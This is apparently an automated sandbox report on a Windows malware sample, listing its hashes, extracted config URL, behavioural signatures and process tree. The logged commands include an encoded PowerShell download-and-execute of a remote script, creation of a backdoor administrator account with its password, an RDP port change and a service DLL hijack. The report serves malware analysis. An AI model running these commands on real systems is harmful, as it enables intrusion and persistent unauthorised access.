Analysis
- max time kernel: 61s
- max time network: 115s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 11-08-2021 08:09
- Static task: static1
- Behavioral task: behavioral1 (sample bfe0ac25eeeb759f7c8e06229c7313a2.exe, resource win7v20210408)
- Behavioral task: behavioral2 (sample bfe0ac25eeeb759f7c8e06229c7313a2.exe, resource win10v20210408)
General
- Target: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Size: 5.9MB
- MD5: bfe0ac25eeeb759f7c8e06229c7313a2
- SHA1: 199c1fbd29f9ec98b83464763dac63ef80998bb3
- SHA256: be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
- SHA512: a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow  pid   process
  18    2268  powershell.exe
  20    2268  powershell.exe
  21    2268  powershell.exe
  22    2268  powershell.exe
  24    2268  powershell.exe
  26    2268  powershell.exe
  28    2268  powershell.exe
  30    2268  powershell.exe
  32    2268  powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- Processes:
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Loads dropped DLL (2 IoCs)
  Processes:
  pid   process
  1212
  1212
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description                   ioc                                                                          process
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT    powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI    powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description                   ioc                                                                                                      process
  File created                  C:\Windows\branding\mediasrv.png                                                                         powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_p4tmh1ws.2qz.psm1       powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF320.tmp                                              powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3AE.tmp                                              powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3EE.tmp                                              powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat         powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log   powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd                                                                              powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png                                                                         powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png                                                                         powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg                                                                           powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zkedwb32.zpm.ps1        powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg                                                                           powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd                                                                             powershell.exe
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                             powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF38E.tmp                                              powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF3FF.tmp                                              powershell.exe
  File created                  C:\Windows\branding\mediasvc.png                                                                         powershell.exe
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description             flow  ioc
  HTTP User-Agent header  20    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  22    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  24    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes:
  pid   process
  996   powershell.exe
  996   powershell.exe
  996   powershell.exe
  3880  powershell.exe
  3880  powershell.exe
  3880  powershell.exe
  1144  powershell.exe
  1144  powershell.exe
  1144  powershell.exe
  3976  powershell.exe
  3976  powershell.exe
  3976  powershell.exe
  996   powershell.exe
  996   powershell.exe
  996   powershell.exe
  2268  powershell.exe
  2268  powershell.exe
  2268  powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid  process
  624
  624
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe (PID 1032)
  command: "C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
  signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 996)
    command: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 808)
      command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5a5vaev\l5a5vaev.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 2104)
        command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9204.tmp" "c:\Users\Admin\AppData\Local\Temp\l5a5vaev\CSC41B3D41B62A4A5CA5DF6D399998BF0.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3880)
      command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1144)
      command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3976)
      command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe (PID 3868)
      command: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (PID 4004)
      command: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      signatures: Modifies registry key
    - C:\Windows\system32\reg.exe (PID 904)
      command: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (PID 3176)
      command: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (PID 1144)
        command: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (PID 2364)
      command: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 1344)
        command: cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 2192)
          command: net start rdpdr
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (PID 2256)
            command: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (PID 3756)
      command: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 1304)
        command: cmd /c net start TermService
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 3748)
          command: net start TermService
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (PID 3112)
            command: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (PID 2332)
      command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (PID 2756)
      command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (PID 3724)
  command: cmd /C net.exe user WgaUtilAcc 000000 /del
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2112)
    command: net.exe user WgaUtilAcc 000000 /del
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3176)
      command: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (PID 3184)
  command: cmd /C net.exe user WgaUtilAcc k85dqMSN /add
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 1244)
    command: net.exe user WgaUtilAcc k85dqMSN /add
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1340)
      command: C:\Windows\system32\net1 user WgaUtilAcc k85dqMSN /add
- C:\Windows\System32\cmd.exe (PID 804)
  command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3840)
    command: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2844)
      command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 3176)
  command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2164)
    command: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2252)
      command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
- C:\Windows\System32\cmd.exe (PID 2192)
  command: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 904)
    command: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2272)
      command: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 3960)
  command: cmd /C net.exe user WgaUtilAcc k85dqMSN
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3008)
    command: net.exe user WgaUtilAcc k85dqMSN
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3188)
      command: C:\Windows\system32\net1 user WgaUtilAcc k85dqMSN
- C:\Windows\System32\cmd.exe (PID 2268)
  command: cmd.exe /C wmic path win32_VideoController get name
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe (PID 4004)
    command: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe (PID 3176)
  command: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (PID 3880)
    command: wmic CPU get NAME
- C:\Windows\System32\cmd.exe (PID 1680)
  command: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (PID 1960)
    command: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2268)
      command: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
Downloads